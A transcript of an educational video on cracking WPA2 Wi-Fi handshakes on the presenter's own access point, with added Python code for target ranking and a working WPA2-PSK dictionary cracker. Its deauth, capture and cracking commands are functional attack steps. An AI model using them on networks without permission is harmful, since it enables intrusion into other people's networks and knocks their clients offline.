Cracking WiFi WPA2 Handshakes (And does it work with WPA3?)
In this video I'm going to show you how to use airmon-ng and airodump-ng to discover the Wi-Fi networks around you and then de-authenticate the clients connected to a specific network so that we can capture the WPA2 four-way handshake. I'll open the capture in Wireshark and walk through the four-way handshake. Note that the password itself is never sent over the air; what the handshake gives an attacker is the material needed to test password guesses offline, and probably the part most people are interested in is where I show you how to crack the Wi-Fi password from that capture. Let this be a warning to you and your family about why you should use good Wi-Fi passwords.

I'm going to show you some of the issues with WPA2 and why you probably want to use WPA3 today if at all possible. You also want to make sure that you use good passwords. Don't use weak passwords, don't use passwords like the one I'll use in this demonstration, and don't use your telephone number. It's amazing how many people still use bad passwords today.

I'll also show you how to use Wifite to attack the same network. Wifite is basically a script that combines a whole bunch of tools together to make it much, much easier to attack Wi-Fi networks. Both approaches, airmon-ng and Wifite, crack the WPA2 network but fail against WPA3, so use WPA3 if you can. Also look at using Wi-Fi 6 and the 5 GHz and 6 GHz bands: fewer devices support those frequencies, but they give you more channels, so better Wi-Fi, and it's less likely that someone with a basic adapter like the one I'm using will even see those networks, because this adapter only supports 2.4 GHz.

I'll also show you how to use Mist to download packet captures from the access point's point of view, so you can see what the Wireshark captures look like when there's an authorization failure, for instance when the wrong password is used. For this demonstration I'm attacking a Mist Wi-Fi network. It's an AI-powered Wi-Fi network, but if it's badly configured, hackers will still be able to attack it, so later in the video I'll show you how to improve the security of a Mist network, or of a standard home network, since a lot of the same principles apply. I really want to thank Juniper for sending me their Wi-Fi access points and for sponsoring this video to help you learn the issues with poorly configured Wi-Fi networks and how to better secure them. Now that's enough talking, let's get started.

In this demonstration I'm using an Alfa network adapter. The problem with this adapter is that it only supports 2.4 GHz. You do get other Wi-Fi adapters: this one, as an example, supports 5 GHz and Wi-Fi 6E. Alfa isn't sponsoring this video; I purchased this adapter myself, although Alfa did send me this adapter and other adapters. I really like the Alfa adapters, they are very, very good and recommended by a lot of people.

So what I'll do is plug the Alfa adapter into my computer. On my computer you can see it says "new USB device detected: connect to host or connect to virtual machine". I'll connect it to my Kali virtual machine and click OK. For this demonstration I'm using Kali Linux inside a virtual machine, in this example VMware Workstation Pro, which is now free, on a Windows 11 computer. You could use Kali natively. A question that always seems to come up is whether you need to buy an external Wi-Fi adapter. That depends: if you're using a virtual machine like I am, then you're going to need an external Wi-Fi adapter, because the VM only sees a virtual Ethernet NIC plus whatever USB devices you pass through to it, not the host's Wi-Fi radio. If you install Kali natively, you may be able to do this with the built-in Wi-Fi adapter. The caveat with any Wi-Fi adapter is that it needs to support monitor mode and packet injection, so your built-in adapter can be used only if its chipset and driver support those two things.

In Kali I've got a terminal open. If I run cat /etc/os-release, you can see that for this demonstration I'm using Kali version 2024.1; depending on when you're watching this there may be a newer release, so just use the latest one. uname -a also shows that I'm running Kali Linux. Do you have to use Kali? No, it just makes these demonstrations a lot easier, because Kali has a lot of built-in tools for ethical hacking.

Now it's really important that I say this: only attack Wi-Fi networks that you own or have permission to attack. I have given myself permission to attack this Wi-Fi network; Juniper gave me this access point, so it's an access point that I own. My team has created a PDF that you can use as a reference, which I'll link below. It shows you what you need: VMware or VirtualBox, a Wi-Fi adapter that supports monitor mode, and your own access point to attack. The commands that I demonstrate here, and other information, are in that PDF, but I'll run through the commands now. First, let's check that the Wi-Fi adapter has been discovered.
If I type ip addr in Kali, you can see that wlan0 is listed. There are different ways to do this: another is iw dev, which shows your Wi-Fi interfaces; you can see the interface is wlan0 and, importantly, it's in managed mode. If you're used to the older iwconfig command, it still works on Kali and also shows wlan0 in managed mode. We're going to put this interface into monitor mode to attack Wi-Fi networks, using airmon-ng.

Before we do that, I'm going to kill any conflicting processes with sudo airmon-ng check kill. I put in my password and you can see wpa_supplicant was killed. Be careful: putting an adapter into monitor mode kills your internet connection through that adapter. In my case that's not a problem, because the external Wi-Fi adapter is dedicated to the attacks and the VM also has a virtual Ethernet connection to Windows that gives me internet access, so I can still ping google.com from the virtual machine. If you only have one adapter, be aware that once you enable monitor mode on it you won't be able to connect to the internet anymore.

With that said, let's enable monitor mode with sudo airmon-ng start wlan0 (sudo gives us root privileges). Previously the interface name was wlan0; if I run iw dev again, notice the interface type is now monitor and the name has changed to wlan0mon. The older iwconfig shows something similar: wlan0mon in monitor mode. In Linux there are always different ways to do things, so you could also just run airmon-ng on its own to see that the interface is now wlan0mon. Use whichever command you prefer; iw dev is the newer one.

Now we want to discover the Wi-Fi networks around us, so we run sudo airodump-ng wlan0mon and press Enter, and a whole bunch of Wi-Fi networks are displayed. I'll stop that by pressing Ctrl+C. This is the network we're going to attack: on this access point I've created two SSIDs, "demo Wi-Fi 2.4 GHz WPA3" and "demo Wi-Fi 2.4 GHz WPA2", and I want to show you how I can attack WPA2 but won't be able to attack WPA3. What we want from this output is the BSSID, the channel (channel 11 here) and the name of the network, so grab that information and store it somewhere. I've stored it in a text file: BSSID, channel number and ESSID.

It's really important that you actually understand what you're doing rather than just being a script kiddie, as some people would say, so let me explain some of the details. The BSSID is the MAC address of the access point. PWR is the signal strength as seen by your adapter, in dBm: notice -38 on our network is a much stronger signal than the network at the top showing -86. The attached PDF has a guide to these numbers as reported by the Wi-Fi adapter: around -40 is a good signal, around -55 is average, -70 is a weak signal, and -80 to -90 is the lower limit of usable signal strength. CH is the channel number; on 2.4 GHz we only see a small number of channels, while many more are available on 5 GHz and 6 GHz. ENC, CIPHER and AUTH show the security in use: here a network using WPA2 with CCMP as the cipher, here a network still using the original WPA, which is really bad, and here open networks with no encryption at all. Ideally today you should be using WPA3; notice the "demo Wi-Fi 2.4 GHz WPA3" network shows WPA3 with CCMP, which is much better than WPA2. Now that's interesting, but let's actually launch an attack, because that's probably what most people are interested in.
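The columns explained above are also what airodump-ng writes to a CSV when you run it with -w <prefix> (the file lands as <prefix>-01.csv next to the .cap). The following is an added example written for this page, not code from the video or from the aircrack-ng project: it parses that CSV layout, ranks the access points weakest-first (open, then WPA, WPA2, WPA3; a transition-mode network advertising "WPA3 WPA2" ranks as WPA2, because it still accepts WPA2-PSK clients and that is what an attacker will target), maps the PWR column to the signal categories from the PDF, and assembles the airodump-ng and aireplay-ng commands used below for a chosen ESSID, refusing for a WPA3-only network since the handshake-capture attack doesn't apply to SAE. The rows in SAMPLE_CSV, the MAC addresses, channels and ESSIDs are all constructed for the example, and the column layout is my reading of airodump-ng's CSV, not something the video shows.

```python
import csv
import io

# Constructed sample of the access-point section of an airodump-ng CSV
# (column layout as airodump-ng writes it with -w; every value is made up
# for this example, none of it is from the video).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:A1:B2:C3:D4:E5, 2024-05-01 12:50:01, 2024-05-01 12:57:10, 11, 130, WPA2, CCMP, PSK, -38, 120, 0, 0.0.0.0, 21, demo-wifi-2.4GHz-WPA2,
02:A1:B2:C3:D4:E6, 2024-05-01 12:50:01, 2024-05-01 12:57:10, 11, 130, WPA3, CCMP, SAE, -39, 118, 0, 0.0.0.0, 21, demo-wifi-2.4GHz-WPA3,
0A:11:22:33:44:55, 2024-05-01 12:50:03, 2024-05-01 12:57:09, 6, 54, WPA, TKIP, PSK, -86, 40, 0, 0.0.0.0, 9, old-guest,
0A:11:22:33:44:66, 2024-05-01 12:50:05, 2024-05-01 12:57:08, 1, 54, OPN, , , -70, 35, 0, 0.0.0.0, 8, CoffeeAP,
0A:11:22:33:44:77, 2024-05-01 12:50:05, 2024-05-01 12:57:08, 36, 866, WPA3 WPA2, CCMP, SAE PSK, -55, 60, 0, 0.0.0.0, 10, transition,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

SECURITY_RANK = {"OPN": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA3": 4}


def security_rank(privacy: str) -> int:
    """Rank a BSS by the weakest mode it offers: "WPA3 WPA2" (transition mode)
    still accepts WPA2-PSK clients, so it is only as strong as WPA2."""
    tokens = privacy.split() or ["OPN"]
    return min(SECURITY_RANK.get(t, 0) for t in tokens)


def signal_label(dbm: int) -> str:
    """Signal categories from the video's PDF (about -40 good, -55 average,
    -70 weak, -80..-90 lower limit); the exact boundaries are my choice."""
    if dbm >= -47:
        return "good"
    if dbm >= -62:
        return "average"
    if dbm >= -75:
        return "weak"
    return "marginal"


def parse_airodump_aps(text: str) -> list:
    """Parse the AP section (everything before 'Station MAC') into dicts."""
    ap_section = text.split("\nStation MAC", 1)[0]
    aps = []
    for row in csv.DictReader(io.StringIO(ap_section), skipinitialspace=True):
        if not (row.get("BSSID") or "").strip():
            continue
        privacy = row["Privacy"].strip()
        aps.append({
            "bssid": row["BSSID"].strip(),
            "channel": int(row["channel"].strip()),
            "essid": row["ESSID"].strip(),
            "privacy": privacy,
            "cipher": row["Cipher"].strip(),
            "auth": row["Authentication"].strip(),
            "power": int(row["Power"].strip()),
            "rank": security_rank(privacy),
        })
    return aps


def weakest_first(aps: list) -> list:
    """Order targets the way an attacker would: weakest security, then strongest signal."""
    return sorted(aps, key=lambda a: (a["rank"], -a["power"]))


def handshake_target(aps: list, essid: str, iface: str = "wlan0mon", prefix: str = "capture"):
    """Return the capture and deauth commands from the video for `essid`, or None
    when the BSS only offers WPA3 (SAE): there is no PSK-derived handshake to crack."""
    for ap in aps:
        if ap["essid"] != essid:
            continue
        if ap["rank"] >= SECURITY_RANK["WPA3"]:
            return None
        return {
            "bssid": ap["bssid"],
            "channel": ap["channel"],
            "signal": signal_label(ap["power"]),
            "capture_cmd": f"sudo airodump-ng -w {prefix} -c {ap['channel']} --bssid {ap['bssid']} {iface}",
            "deauth_cmd": f"sudo aireplay-ng --deauth 0 -a {ap['bssid']} {iface}",
        }
    return None


if __name__ == "__main__":
    found = parse_airodump_aps(SAMPLE_CSV)
    for ap in weakest_first(found):
        print(f"{ap['bssid']}  ch{ap['channel']:>3}  {ap['privacy']:<9} {ap['auth']:<8} "
              f"{signal_label(ap['power']):<8} {ap['essid']}")
    print(handshake_target(found, "demo-wifi-2.4GHz-WPA2"))
    print(handshake_target(found, "demo-wifi-2.4GHz-WPA3"))
```

The ranking deliberately takes the weakest advertised mode rather than the strongest: an AP in WPA3 transition mode looks like "WPA3" at first glance in the ENC column but is attacked exactly like the WPA2 network in this video.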
We run sudo airodump-ng -w <capture-name> -c 11 --bssid <BSSID> wlan0mon (sudo gives us root privileges). The -w option writes the output to a capture file; the name is up to you, and airodump-ng appends a sequence number, so the file will be called something like <capture-name>-01.cap. The channel we're attacking is channel 11, which we previously discovered, the BSSID is the MAC address of the network we previously discovered, and wlan0mon is the interface we're using. Running that command, we can see that no clients are currently connected, we can see the ESSID, and at the top we're not yet seeing a captured four-way handshake.

So what we're going to do is open another window and de-authenticate the clients on that access point: sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon. The 0 means we don't stop, it keeps sending de-authentication frames continuously to all clients; -a is the MAC address of the access point, so make sure you substitute the BSSID you're attacking; and wlan0mon is the Wi-Fi interface. I put in my password and, as you can see, deauth frames are being sent for the access point. To make sure we get a capture, I'm going to connect a client to that Wi-Fi network, and what you can see is that a WPA handshake has been captured. When my client connects to the WPA2 network, the handshake is captured on Kali, but the client keeps getting bumped off the network: the connection to WPA2 fails and the phone actually ends up connecting to the WPA3 SSID instead because it was knocked off WPA2. The client was knocked off the network, it reconnected, and we captured the handshake, and that's what we need to crack the password.

Now that we've captured the handshake, we can stop the deauth attack and stop airodump-ng. Type ls and you'll see the capture file, <capture-name>-01.cap. We can simply open it in Wireshark; I'll append & to the command so that I get the terminal back. In Wireshark there will be a lot of traffic, so let's filter with eapol to see just the handshake. Notice here we can see Mist authenticating the client, then the EAPOL-Key messages: message 1 of 4 from the AP to the client, and message 2 of 4, the reply from the client to the AP, which is the one we're interested in. If we expand 802.1X Authentication and scroll down, notice the WPA Key MIC and WPA Key Data fields. What we've captured from the client is not the password itself but a MIC computed with a key that is derived from the password, together with the nonces that went into that key, and that is what lets us test password guesses offline. What's really nice here is that you can see all the communication between the client and the AP around the four-way handshake.

Let's go back. One thing you probably want to do is stop monitor mode: sudo airmon-ng stop wlan0mon. Now if I run iw dev, notice the interface is back to wlan0 and in managed mode, so we've changed it from monitor mode back to managed mode. If you don't do this you won't be able to use this interface for normal internet access.
But we probably want to crack the password from that capture file. There are multiple ways to do this: you could use a dictionary attack or a brute-force attack. I'll put a link below to a video that shows how to use GPUs for a brute-force attack against a Wi-Fi password, but all we're going to do in this example is use a wordlist. Kali ships a bunch of wordlists: if I run the wordlists command, a whole bunch of them are shown and I'm asked whether I want to extract the rockyou wordlist. The answer is yes; the file ships gzip-compressed as rockyou.txt.gz, so it needs to be extracted before I can use it to crack the network.

To do that we run aircrack-ng <capture-name>-01.cap -w /usr/share/wordlists/rockyou.txt. Just to make that clear, I'll clear the screen: the first argument is the capture file, which would be whatever your file is called, and the wordlist we're using is rockyou. That took seconds. Notice the command, then it reads the packets, decodes them, and reports the password: spiderman. Really bad password. Don't use bad passwords, even if you've got an amazing Wi-Fi system: this is a Mist AI system, and if it's badly configured people will be able to crack your network. Use strong passwords: uppercase, lowercase, special characters, and make it long, 20 characters or more, 25 or 30 if you can. Don't use simple passwords like this; you saw how simple it was to crack.

That's an example of a really poorly configured Wi-Fi network. In the Juniper Mist interface I can go and look at my network: here's the "demo Wi-Fi 2.4 GHz WPA2" network and here's the password. Once again, it's a really bad idea to use a PSK with such a poor password.
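What aircrack-ng just did in those few seconds is worth seeing in code, because it shows exactly which fields from the Wireshark view matter and why the password never had to be on the air. The following is an added example written for this page, not code from the video, from aircrack-ng or from Juniper: it implements the WPA2-PSK key derivation from IEEE 802.11i (PBKDF2-HMAC-SHA1 with the SSID as salt for the PMK, the PRF-512 for the PTK, and the HMAC-SHA1 MIC over EAPOL-Key message 2), decodes the Key Information bits that Wireshark shows under 802.1X Authentication to tell the four messages apart, and then runs a small wordlist against a handshake. Because there is no real capture to load offline, build_message2 constructs message 2 of 4 itself, laid out as a supplicant would send it, with a MIC valid for the passphrase spiderman; the SSID, MAC addresses, nonces, RSN IE and WORDLIST are assumed values, not from the video. It is in Python rather than the shell because the point is the arithmetic, not the commands.

```python
import hashlib
import hmac

# EAPOL-Key frame layout (4-byte EAPOL header, then the key descriptor):
# descriptor type at 4, Key Information 5..6, Key Length 7..8, Replay Counter
# 9..16, Key Nonce 17..48, Key IV 49..64, Key RSC 65..72, Key ID 73..80,
# Key MIC 81..96, Key Data Length 97..98, Key Data from 99.
KEY_INFO, NONCE, MIC = slice(5, 7), slice(17, 49), slice(81, 97)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so precomputed tables only work for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Every input except the PMK is visible in the captured handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)  # 4 x 20 bytes, truncated to 512 bits below
    )
    return out[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the whole EAPOL
    frame with the MIC field zeroed, truncated to 16 bytes. KCK = PTK[0:16]."""
    zeroed = frame[:MIC.start] + bytes(16) + frame[MIC.stop:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def parse_eapol_key(frame: bytes) -> dict:
    """Decode the Key Information flags Wireshark shows under 802.1X
    Authentication and work out which of the four messages this is."""
    info = int.from_bytes(frame[KEY_INFO], "big")
    install, ack = bool(info & 0x40), bool(info & 0x80)
    mic, secure = bool(info & 0x100), bool(info & 0x200)
    if ack and not mic:
        message = 1  # AP -> client: ANonce
    elif mic and not ack and not secure:
        message = 2  # client -> AP: SNonce + MIC, the frame the cracker needs
    elif ack and mic and install:
        message = 3  # AP -> client: GTK, MIC
    else:
        message = 4  # client -> AP: MIC only
    return {"message": message, "nonce": frame[NONCE], "mic": frame[MIC],
            "descriptor_version": info & 0x7}


# --- Constructed sample handshake: assumed values, none of it from the video ---
SSID = "demo-wifi-2.4GHz-WPA2"
AP_MAC = bytes.fromhex("02a1b2c3d4e5")       # BSSID (assumed)
CLIENT_MAC = bytes.fromhex("02f6e5d4c3b2")   # station (assumed)
ANONCE = bytes(range(32))                    # fixed nonces keep the example deterministic
SNONCE = bytes(range(32, 64))
# RSN IE carried in message 2: version 1, group CCMP, pairwise CCMP, AKM PSK
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def build_message2(passphrase: str) -> bytes:
    """Build EAPOL-Key message 2 of 4 as a supplicant would, with a MIC valid
    for `passphrase`. Stands in for the frame airodump-ng writes into the .cap."""
    key_info = 0x010A  # pairwise | MIC present | descriptor version 2 (HMAC-SHA1 MIC)
    body = (bytes([2]) + key_info.to_bytes(2, "big") + bytes(2)   # RSN descriptor, info, key len 0
            + (1).to_bytes(8, "big") + SNONCE                     # replay counter, SNonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16)         # IV, RSC, key ID, MIC placeholder
            + len(RSN_IE).to_bytes(2, "big") + RSN_IE)
    frame = bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v2, type 3 = EAPOL-Key
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return frame[:MIC.start] + eapol_mic(kck, frame) + frame[MIC.stop:]


def crack_psk(ssid: str, ap_mac: bytes, client_mac: bytes, anonce: bytes, message2: bytes, wordlist):
    """Offline dictionary attack as aircrack-ng runs it: one PBKDF2 per candidate,
    then a cheap PRF + HMAC to compare against the captured MIC. Returns the
    passphrase, or None when the wordlist does not contain it."""
    parsed = parse_eapol_key(message2)
    if parsed["message"] != 2:
        raise ValueError("need EAPOL-Key message 2 of 4 (carries SNonce and MIC)")
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # a WPA passphrase is 8..63 characters
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac,
                           anonce, parsed["nonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, message2), parsed["mic"]):
            return candidate
    return None


WORDLIST = ["123456", "password", "iloveyou", "spiderman", "princess"]  # constructed stand-in for rockyou.txt

if __name__ == "__main__":
    msg2 = build_message2("spiderman")
    info = parse_eapol_key(msg2)
    print(f"captured message {info['message']} of 4, MIC {info['mic'].hex()}")
    print("cracked:", crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, msg2, WORDLIST))
```

Each candidate costs one PBKDF2 run of 4096 iterations, which is why the attack is wordlist-bound or GPU-bound (hashcat's WPA mode 22000 works on the same PMK, PTK and MIC triple shown here) and why aircrack-ng never decrypts anything, it only checks MICs. The same code explains the WPA3 result later in the video: with SAE the PMK is the output of the Dragonfly exchange rather than of pmk_from_passphrase, so there is no function to run candidates through against the captured frames.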
In an enterprise you're going to want to use 802.1X with a RADIUS server to make your network much more secure. But let's have a look at the other network, the WPA3 one. I've also configured the WPA3 network with the same really bad password of spiderman; let's see if we can crack that one.

Back on Kali, let's first demonstrate the script-kiddie way of doing it with sudo wifite. Wifite does a lot of the work for you: it enables monitor mode (that's already done) and shows you the Wi-Fi networks, so here's the demo Wi-Fi network using WPA2 and here's the one using WPA3. I'll attack the WPA2 network first just to show you how easy it is to crack with Wifite. Wifite starts with a PMKID attack; I'm going to skip that and continue, so in this case it's looking for a handshake, very similar to what we did with airodump-ng. I'll get this phone to connect to the WPA2 network, and as soon as it did that, notice the handshake was captured, Wifite runs it against its probable wordlist and gets the password: spiderman. If you were doing this as an attacker you would just wait for a client to connect to the network; obviously I'm speeding things up by getting the client to connect straight away. Notice how easy it was to crack that network.

Now let's try to crack the WPA3 network. I'll stop this, and in this case the target is network 2, the WPA3 network. I'll stop the PMKID attack and press continue, and now on the phone I'm going to connect to the WPA3 network. Notice it says "failed to crack handshake: did not contain a password". If I type ls and go into the hs folder and type ls again, there is the capture for WPA2 and here's the capture for WPA3. Here it was attacking that Wi-Fi network, and if I filter for EAPOL it has the capture, so a four-way handshake was captured, but it's not able to crack the password.

Let's try the old-fashioned way: aircrack-ng on the file with the rockyou wordlist. Notice it says "unsupported version key encountered, WPA3 not yet supported". It tries to attack it but can't, because it's not supported. The reason is that WPA3 replaces the pre-shared key with SAE: the pairwise master key comes out of the SAE exchange rather than being derived directly from the passphrase, so the four-way handshake that follows gives an attacker nothing to test passphrase guesses against offline. WPA3 also makes Protected Management Frames mandatory, which is why a de-authentication attack like the one above doesn't knock WPA3 clients off the network.

So I've now shown you two ways to crack a WPA2 Wi-Fi network: we used airmon-ng and aircrack-ng the hard way, then Wifite, which basically combines a bunch of tools together and makes it much easier. I was able to crack the password when this access point was using WPA2, but not when it was using WPA3. So in the real world, look at WPA3. The only problem with WPA3 is that not all clients support it, so what you might have to do is put your older clients on a separate WPA2 network, treat that as your insecure network, and put your important clients on a WPA3 network. Also look at using 5 GHz and 6 GHz: this network adapter can't even see 5 GHz or 6 GHz networks, so someone would have to invest in a more expensive adapter to attack you. The whole idea is to put up barriers and make it harder for an attacker to attack your network: look at WPA3, look at 5 GHz and 6 GHz, and use very good, strong passwords. Don't use passwords like spiderman. In Juniper Mist's portal,
going to Monitor and then Service Levels, we'll be able to see what's taking place. As an example, notice the Galaxy S22 Ultra: authorization and association happening a lot in a very short amount of time. Something's wrong here: notice disassociation, authorization and association, a whole bunch of messages like that, and then the client was finally able to access the network. I'm going to run the deauth attack again and try to connect the client to that network, and what's happening all the time is that it's getting disconnected: "connection failed". On the Juniper Mist system we can see this happening a lot; the time is about 12:57, and notice all these authorization and association messages in the last few seconds, a whole bunch of them, and the client can't connect to the network. Under the badge here we can also see where there's been an authorization failure: the Pixel 7 had the wrong password, as an example, and what's nice is that we're told there was an authorization issue, "PSK failed", so a wrong password. What's really nice is that you can download a packet capture and look at it, and you'll see the association request, association response and the other messages. That's what I really like about the Mist system: you can download packet captures very, very easily, for example for authorization failures or association failures, and see what's going on.

I hope you enjoyed this video. If you did, please like it, consider subscribing to my YouTube channel and click the bell to get notifications. I'm David Bombal and I want to wish you all the very best.